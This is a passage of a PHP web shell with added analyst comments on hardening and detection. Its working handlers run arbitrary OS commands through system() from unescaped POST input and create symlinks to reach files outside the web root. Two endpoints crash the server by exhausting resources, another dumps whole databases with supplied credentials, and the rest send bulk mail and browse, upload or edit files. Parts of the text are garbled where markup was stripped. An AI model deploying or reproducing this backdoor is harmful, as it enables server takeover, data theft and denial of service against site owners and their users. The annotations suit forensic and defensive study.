// `do=eval` renders the form for the handler above and exits.
if($_GET['do']=="eval"){ echo $head.$formp.$nowaddress.'


'.$end;exit; } if($_GET['do']=="info"){ if(ini_get('register_globals')){ $registerg="Enable"; }else{ $registerg="disable"; } if(extension_loaded('curl')){ $curls="Enable"; }else{ $curls="disable"; } if(@function_exists('mysql_connect')){ $db_on = "Mysql : On"; }; if(@function_exists('mssql_connect')){ $db_on = "Mssql : On"; }; if(@function_exists('pg_connect')){ $db_on = "PostgreSQL : On"; };if(@function_exists('ocilogon')){ $db_on = "Oracle : On"; }; echo $head."Operating System : ".php_uname()."
Server Name : ".$_SERVER['HTTP_HOST']."
Disable_Functions : ".$disablef."
Safe_Mode : ".$safe_modes."
Openbase_dir : ".ini_get('openbase_dir')."
Php Version : ".phpversion()."
Free Space : ".sizee(disk_free_space("/"))."
Total Space : ".sizee(disk_total_space("/"))."
Register_Globals : ".$registerg."
Curl : ".$curls."
Database ".$db_on."
Server Name : ".$_SERVER['HTTP_HOST']."
Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; exit; } if ($_GET['do']=="cmd"){ echo $head.'

'.$end;exit;} if ($_GET['do']=="symlink"){ echo $head.'

SymLink With PHP
TO


SymLink With OS :
TO

'.$end;exit;}

// Analyst note: symlink creation from two POST fields. A link placed inside
// a served directory can expose files outside it when the web server follows
// symlinks. Hardening: prefer `Options -FollowSymLinks` or
// `SymLinksIfOwnerMatch` on Apache, and enforce open_basedir; detection: new
// symbolic links under the document root.
if ($_POST['ad1syp'] && $_POST['ad2syp']){
    if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
        alert("Symlink Worked !");
    }else{
        alert("Symlink Not Worked !");
    }}

// Analyst note: this variant concatenates two POST values into a command
// string and hands it to system() with no escaping, i.e. a direct OS command
// sink. Child processes spawned by the web-server account are a strong signal
// for host-based detection; adding system (and its siblings) to
// disable_functions blocks this path where the application does not need it.
if ($_POST['ad1syc'] && $_POST['ad2syc']){
    if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
        alert("Symlink Worked !");
    }else{alert("Symlink Not Worked !");}
}

// `do=d0slocal` renders the page linking to the resource-exhaustion handlers.
if ($_GET['do']=="d0slocal"){ echo $head.'

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure '.$end;exit;}

// Analyst note: two self-inflicted resource-exhaustion handlers selected by
// the `dosthisserver` query parameter. Both run inside the PHP worker that
// serves the request, so the damage is bounded by whatever limits that worker
// has: memory_limit, max_execution_time, and process-level limits set by the
// process manager or the OS. Hosts where those limits are absent or very
// generous are the ones at risk. Requests carrying `dosthisserver` are a
// direct indicator.
if ($_GET['dosthisserver']=="1"){
    // Builds a very long digit string and calls bcpow() on it inside a loop
    // whose counter is never advanced.
    function dosserver(){
        $junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
        for($i=0;$i<2;){
            $buff=bcpow($junk, '3', 2);
            $buff=null;
        }
    }
    dosserver();
}
if ($_GET['dosthisserver']=="2"){
    // Function that calls itself with no terminating condition.
    function cx(){cx();}
    cx();
}

// Hash/encode utility page: depending on `hashtoh`, computes md5, sha1
// (selector value "sh1"), crc32, or base64 encode/decode of `stringtoh`.
// No file or process access happens in this branch.
if ($_GET['do']=="加密转换"){
    $hash=null;
    if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
        $hash=md5($_GET['stringtoh']);
    }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
        $hash=sha1($_GET['stringtoh']);
    }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
        $hash=crc32($_GET['stringtoh']);
    }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
        $hash=base64_encode($_GET['stringtoh']);
    }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
        $hash=base64_decode($_GET['stringtoh']);
    }
    echo $head.'

加密转换

'.$end;exit;} if ($_GET['do']=="dump"){ echo $head.'

'; echo '

备份数据库

DB Type:
Server:
Username:
Password:
数据库操作 Name:

'.$end;exit;}

// Analyst note: database export. With `username`, `dbname` and `method` in
// the POST body, the script connects with the supplied credentials, walks
// every table, and writes CREATE TABLE and INSERT statements to a file named
// "Dump-<dbname>-<Y-m-d>.sql" (or ".sql.gz") relative to the working
// directory, then streams that file back as a download.
// Forensics: no unlink() follows in this handler, so the dump file stays on
// disk - look for "Dump-*.sql" / "Dump-*.sql.gz" next to the script, and for
// a large response body on the matching POST in the access log.
// The code depends on the legacy mysql_* extension, which was removed in
// PHP 7.0, so this path can only run on older runtimes.
// Containment: treat every credential that could reach this database from
// the host as exposed, and restrict database accounts used by the web tier to
// the minimum schema and privileges they need.
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
    $date = date("Y-m-d");
    $dbserver = $_POST['server'];
    $dbuser = $_POST['username'];
    $dbpass = $_POST['password'];
    $dbname = $_POST['dbname'];
    $file = "Dump-$dbname-$date";
    $method = $_POST['method'];
    // `method` other than "sql" selects gzip output.
    if ($method=='sql'){
        $file="Dump-$dbname-$date.sql";
        $fp=fopen($file,"w");
    }else{
        $file="Dump-$dbname-$date.sql.gz";
        $fp = gzopen($file,"w");
    }
    // Writes one chunk to the open dump handle, plain or gzip as selected.
    function write($data) {
        global $fp;
        if ($_POST['method']=='sql'){
            fwrite($fp,$data);
        }else{
            gzwrite($fp, $data);
        }}
    mysql_connect ($dbserver, $dbuser, $dbpass);
    mysql_select_db($dbname);
    $tables = mysql_query ("SHOW TABLES");
    while ($i = mysql_fetch_array($tables)) {
        $i = $i['Tables_in_'.$dbname];
        // Schema first, then one INSERT per row with each value quoted.
        $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
        write($create['Create Table'].";\n\n");
        $sql = mysql_query ("SELECT * FROM ".$i);
        if (mysql_num_rows($sql)) {
            while ($row = mysql_fetch_row($sql)) {
                foreach ($row as $j => $k) {
                    $row[$j] = "'".mysql_escape_string($k)."'";
                }
                write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
            }
        }
    }
    if ($method=='sql'){
        fclose ($fp);
    }else{
        gzclose($fp);}
    // Send the finished file to the client in 64 KiB chunks.
    header("Content-Disposition: attachment; filename=" . $file);
    header("Content-Type: application/download");
    header("Content-Length: " . filesize($file));
    flush();
    $fp = fopen($file, "r");
    while (!feof($fp)) {
        echo fread($fp, 65536);
        flush();
    }
    fclose($fp);
}

// `do=mail` renders the mail form and exits.
if ($_GET['do']=="mail"){ echo $head.'

Address :

Subject :



Number For Send :

'.$end;exit;} if ($_POST['admail'] && $_POST['submail'] ){ for($mi=0;$miChmod
To
".$end;exit; } /* if($_GET['do']=="edit"){ if($_GET['filename']=="dir"){ if(is_readable($_GET['address'])){ chdir($_GET['address']);}else{alert("Permission Denied !");} }} */ $araddresss=explode($slash,getcwd()); $matharrayy=count($araddresss)-1; $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); for($countback=0;$countback=1){ $rr=str_replace($basep,"",getcwd()); $rr=str_replace("\\","/",$rr); $diropen=''.$parsef.''; }else{ $diropen=''.$parsef.''; } return $diropen; } if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];} if($cwd==''){$cwd=getcwd();}$nowaddress=''; $ad=getcwd(); $hand=opendir("$ad"); $coi=0; $coi2=0; while (false !== ($fileee = readdir($hand))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi++; $fil=$fil.'

'.$fileee.'

'.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'DLRen Del
' ;} else{ if ($coi2 %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi2++; $file=$file.'

'.openf($fileee).'

'.sizee(filesize($fileee)).''.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'EditDLRen Del
' ;} } } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$fil.$file.' '.$end; ?>

'.$formg.'命令执行 :

'.$formg.'Change Dir :

'.$formg.'Create Dir :

'.$formg.'Create File :

'.$formg.'Upload :
'.$nowaddress.'

'.$formg.'Copy File :
To